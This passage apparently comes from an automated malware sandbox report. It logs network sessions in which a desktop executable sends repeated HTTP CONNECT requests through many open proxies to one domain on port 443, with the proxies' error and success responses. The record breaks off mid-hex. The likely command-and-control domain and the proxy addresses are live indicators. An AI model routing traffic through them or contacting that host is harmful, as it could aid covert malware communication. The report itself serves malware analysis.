                                                                                                      1744192.168.2.45487937.235.53.20867896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.059627056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1745192.168.2.45469327.65.30.3710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.129352093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1746192.168.2.454902104.19.79.238806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.129524946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.217565060 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1747192.168.2.44990845.225.184.2069996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.134185076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.864015102 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1748192.168.2.454686120.26.0.1188806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.159845114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.507039070 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1749192.168.2.449939103.76.104.3080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.186424971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1750192.168.2.454739142.54.232.641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.214413881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1751192.168.2.454876125.228.143.20741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.214416027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1752192.168.2.454147198.176.54.3431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.228596926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.365953922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1753192.168.2.45485245.251.231.11356786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.229573965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1754192.168.2.454847103.204.54.5010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.243340015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1755192.168.2.454899178.79.165.164419216812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.264091969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834498882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.377612114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.444016933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.443963051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.444005013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1756192.168.2.454858175.183.82.22181936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.275188923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1757192.168.2.454866115.171.217.4878906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.275301933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1758192.168.2.45487861.247.178.7080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.279736996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.545828104 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1759192.168.2.454854194.233.78.142496286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.286112070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.178993940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.366003990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.881582022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569308043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.240525007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.912377119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:59.240550995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1760192.168.2.454883103.216.50.22580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.328183889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.680291891 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1761192.168.2.454925104.20.22.93806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.330038071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.418086052 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1762192.168.2.454931104.21.194.19806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.330324888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.417983055 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1763192.168.2.454921104.16.108.42806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.336576939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.426260948 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1764192.168.2.454939104.24.136.68806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.340640068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.430440903 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1765192.168.2.454896139.159.176.14780906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.436589003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.147006989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1766192.168.2.454149159.223.71.71592436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.438306093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.365751982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.683996916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.272151947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.178560019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.038243055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1767192.168.2.45407945.140.88.219806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.438306093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.475214958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.475193977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1768192.168.2.454898124.70.78.15780006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.438457012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1769192.168.2.45491791.189.177.18631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.453739882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.460352898 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid/5.7
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3532
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      X-Cache: MISS from lb1
                                                                                                      X-Cache-Lookup: NONE from lb1:3128
                                                                                                      Via: 1.1 lb1 (squid/5.7)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 